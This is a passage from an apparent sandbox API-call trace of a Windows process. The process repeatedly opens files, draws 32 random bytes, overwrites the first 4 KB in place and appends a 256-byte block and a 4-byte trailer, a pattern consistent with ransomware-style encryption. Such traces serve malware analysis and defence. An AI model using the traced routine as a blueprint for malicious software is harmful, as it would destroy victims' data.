returned 0x4f10000 [0086.449] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.450] GetProcessHeap () returned 0x4f10000 [0086.450] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.451] GetProcessHeap () returned 0x4f10000 [0086.451] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.452] SetFilePointerEx (in: hFile=0x9fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.452] WriteFile (in: hFile=0x9fc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.452] WriteFile (in: hFile=0x9fc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.452] GetProcessHeap () returned 0x4f10000 [0086.452] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.452] CloseHandle (hObject=0x9fc) returned 1 [0086.456] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 161 [0086.456] SetFilePointerEx (in: hFile=0xa00, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.456] ReadFile (in: hFile=0xa00, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.456] SetFilePointerEx (in: hFile=0xa00, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.457] GetProcessHeap () returned 0x4f10000 [0086.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.457] GetProcessHeap () returned 0x4f10000 [0086.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.457] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.457] GetProcessHeap () returned 0x4f10000 [0086.457] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.457] ReadFile (in: hFile=0xa00, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0xcd3, lpOverlapped=0x0) returned 1 [0086.497] SetFilePointerEx (in: hFile=0xa00, liDistanceToMove=0xfffff32d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.497] WriteFile (in: hFile=0xa00, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0xcd3, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0xcd3, lpOverlapped=0x0) returned 1 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.497] GetProcessHeap () returned 0x4f10000 [0086.497] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.498] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.498] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.499] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.499] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.500] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.500] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.501] GetProcessHeap () returned 0x4f10000 [0086.501] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.502] GetProcessHeap () returned 0x4f10000 [0086.502] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.502] SetFilePointerEx (in: hFile=0xa00, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.502] WriteFile (in: hFile=0xa00, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.502] WriteFile (in: hFile=0xa00, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.502] GetProcessHeap () returned 0x4f10000 [0086.502] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.502] GetProcessHeap () returned 0x4f10000 [0086.502] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.502] GetProcessHeap () returned 0x4f10000 [0086.502] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.502] CloseHandle (hObject=0xa00) returned 1 [0086.503] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 162 [0086.503] SetFilePointerEx (in: hFile=0xa04, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.503] ReadFile (in: hFile=0xa04, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.503] SetFilePointerEx (in: hFile=0xa04, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.503] GetProcessHeap () returned 0x4f10000 [0086.503] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.503] GetProcessHeap () returned 0x4f10000 [0086.503] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.503] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.503] GetProcessHeap () returned 0x4f10000 [0086.503] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.503] ReadFile (in: hFile=0xa04, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.556] SetFilePointerEx (in: hFile=0xa04, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.556] WriteFile (in: hFile=0xa04, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.556] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.556] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.557] GetProcessHeap () returned 0x4f10000 [0086.557] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.557] 